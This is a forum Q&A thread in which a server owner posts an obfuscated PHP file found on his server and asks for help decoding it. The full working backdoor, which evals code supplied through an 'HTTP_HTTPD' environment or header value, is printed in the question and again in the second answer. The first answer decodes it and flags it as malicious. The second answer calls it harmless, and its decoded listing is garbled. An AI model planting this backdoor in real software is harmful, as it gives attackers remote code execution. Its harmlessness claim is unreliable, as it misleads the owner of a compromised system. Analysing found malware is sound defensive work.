Suspicious file found on server

Question

I have found a suspicious file on my server, I am attempting to decode and figure out what it was put there to do.

The code is as follows, any tips on how to decode this.

<?php if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=@getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {@eval($mystr1s2235);} ?>

Thanks,

Alan.

Answer 1

The functions in php you're looking for appear to be a combination of base64_decode and urldecode. For example:

urldecode("\x6d\x79s\x74r\x31s\x311\x30");

gives "mystr1s110"

Also part of the string in the eval statement base64_decodes to:

function mystr1s78($mystr1s99){${"\x6d\x79s\x74r\x31s\x311\x30"}=mystr1s21::${"\x6dys\x74r1\x73178"};return ${"my\x73t\x72\x31s1\x310"}( mystr1s21::${${"\x6dy\x73tr\x31s9\x39"}} );}

Those encoded strings all reference variables defined earlier, for example \x6d\x79s\x74r\x31s\x311\x30 url-decodes to mystr1s110

This looks very nasty to me. Although I'm no security expert. I would just php -a and figure out what chunks are decoded how, then reconstruct the code from there.

On a side note. You pulled this off the server, right?

EDIT:

Was kind of intrigued by this. After a complete decode I got this:

<?php 

if(!function_exists("myFunction2")){

class myClass {
    static $myVar1="SFRUUF9IVFRQRA=="; 
    static $myVar2=“base64_decode”; 
}

function myFunction1($myArg)
{
    ${$myVar4}=myClass::$myVar2;  // myClass::$myVar2 is just "base64_decode"
    return $myVar4( myClass::${$myArg} );  // reuturning base64_decode of the argument
}

function myFunction2($myArg2) 
{
    return myClass::${$myVar3} 
} 

$myFinalVar=@getenv(myFunction1('myVar1'));   //just gets env variable of base64 decode of myVar1

if($myFinalVar) {
    @eval($myFinalVar);  //executes

} 

?>

Looks to me like its a script designed to execute a script on another server. (i.e. they could just hit the web address with their script in url and it would execute. SFRUUF9IVFRQRA== decodes to HTTP_HTTPD so they could hit http://yourwebsite.com/thisscript.php?HTTP_HTTPD=myscriptaddress.php and it would run whatever they wanted on your server.

Answer 2

According to me, it is not a harmful script, in fact, it is not of any use.

Here is the basis for my comments -

To decode, you can simply put the hex strings as argument to print_r().

print_r("b\x61\x73e\x364\x5fde\x63\x6fd\x65");

Complete decoded code is:

<?php 
if(!function_exists("mystr1s45")){
    class mystr1s21 { 
        static $mystr1s279="SFRUUF9IVFRQRA==";
        static $mystr1s178="base64_decode"; 
    }
    eval(
        eval(
            function mystr1s78($mystr1s99){ // returns 'HTTP_HTTPD'
                ${mystr1s110}=mystr1s21::${mystr1s178};
                return ${mystr1s110}( mystr1s21::${${mystr1s99}} );
            }
        );
        eval(
            function mystr1s45($mystr1s66) {
                return mystr1s21::${${mystr1s66}};
            }
        );
    );
}
$mystr1s2235=@getenv(mystr1s78("mystr1s279"));
if($mystr1s2235) {
    @eval($mystr1s2235);
}
?>

The function mystr1s78 will return 'HTTP_HTTPD'. This will used as environment variable to get its value using getenv.

If you run the decoded code, you will face 'Parsing Error' near definition of function mystr1s78. This is because, eval expects a string and string must be a valid code statement(not expression).

Parse error: syntax error, unexpected 'mystr1s78' (T_STRING), expecting '('

As far as I know, by default, HTTP_HTTPD is not an environment variable which is set by apache or any webserver and even if it is a variable with some value, passing it to eval will not do anything.

To confirm, you can set an environment variable HTTP_HTTPD as follows:

<?php 
apache_setenv('HTTP_HTTPD',<some_value>);
if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=@getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {@eval($mystr1s2235);} 

?>

Please let us know if you think this is malicious and can harm the system.